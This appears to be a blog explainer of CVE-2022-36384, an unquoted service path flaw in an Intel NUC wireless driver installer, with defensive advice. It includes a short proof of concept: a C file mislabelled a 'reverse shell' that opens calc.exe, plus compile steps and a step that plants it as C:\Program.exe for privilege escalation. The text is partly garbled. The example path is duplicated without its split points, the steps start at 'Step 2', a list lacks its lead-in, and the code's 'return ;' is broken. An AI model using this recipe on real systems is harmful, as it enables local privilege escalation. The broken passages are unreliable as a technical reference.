CVE-2022-36384 - Unquoted Search Path Vulnerability in Intel® NUC Kit Wireless Adapter Drivers—How a Simple Installer Bug Can Let Local Attackers Escalate Privilege

---

Introduction

Security flaws don’t always need to be fancy—sometimes the simplest mistakes can create major vulnerabilities. In this long-read post, I’ll break down CVE-2022-36384, an unquoted search path vulnerability found in the installer software for some Intel® NUC Kit Wireless Adapter drivers before version 22.40 for Windows 10. We'll explain what the issue is and why it matters, see how an attacker could exploit it with real code, and provide tips and resources for further reading.

What is CVE-2022-36384?

CVE-2022-36384 refers to a bug in the installer for certain Intel wireless adapter drivers. The vulnerability stems from the way the program sets up its Windows services during installation.

If the installation path contains spaces and isn't surrounded by quotes, Windows might misinterpret the path, leading to unintended execution of malicious programs placed by local attackers. Since installers often run with higher privileges, this opens the door for privilege escalation by someone who already has access to the computer.

Affected Versions: Before 22.40 for Windows 10

- CVE: CVE-2022-36384
- CWE: CWE-428: Unquoted Search Path or Element

Original References

- Intel Security Advisory INTEL-SA-00698
- NVD Entry for CVE-2022-36384

How the Flaw Happens: Unquoted Search Path Explained

When Windows starts a service or runs an application, it uses the *path* specified in the Windows registry or service manager. If the path to the executable is not quoted and contains spaces, Windows will search for executables in every chunk of the path, from left to right. This can be exploited.

Example Path

C:\Program Files\Intel NUC Wireless\driver.exe

C:\Program Files\Intel NUC Wireless\driver.exe

A local attacker can plant a malicious Program.exe in C:\, which gets executed instead of the intended driver!

The vulnerability only helps local attackers (they need some level of access)

- A writable directory earlier in the search path (commonly C:\ is only writable by admins, but this isn't always the case)

Let's make a simple reverse shell (for demonstration purposes, here it'll just open a calculator)

// evil.c
#include <stdlib.h>
int main() {
    system("calc.exe");
    return ;
}

Compile it

cl /FeProgram.exe evil.c

Step 2: Copy Program.exe to C:\

copy Program.exe C:\

Step 3: Install the affected Intel driver

As the driver installer runs, it may try to set up services using an unquoted path. If it does, Windows will find and execute your malicious C:\Program.exe with elevated privileges, instead of the actual installer binary!

What Happens Next?

When the Intel installer or relevant service runs, your malicious file is run as SYSTEM or under high privileges. A real attacker would use a reverse shell, add a new admin account, or otherwise further compromise the machine. This is classic privilege escalation!

Defensive Steps

- Update the Driver: Intel fixed this bug in version 22.40—download and install the latest Intel Wireless drivers here.
- Check Installed Services: Look in services.msc or via sc qc <serviceName> for unquoted paths in service executables.
- Windows Hardening: Setting C:\ and other directories to require admin rights to write can block some exploits.

Conclusion

Unquoted search path vulnerabilities like CVE-2022-36384 show how minor oversights can have security consequences. While privilege escalation requires local access, combining this flaw with phishing or other attacks makes it dangerous on shared or public computers.

Now you know what CVE-2022-36384 is, how it works, how it's exploited, and how to protect yourself. For more, check out Intel’s official advisory and NIST NVD details.

Timeline

Published on: 11/11/2022 16:15:00 UTC
Last modified on: 11/16/2022 16:15:00 UTC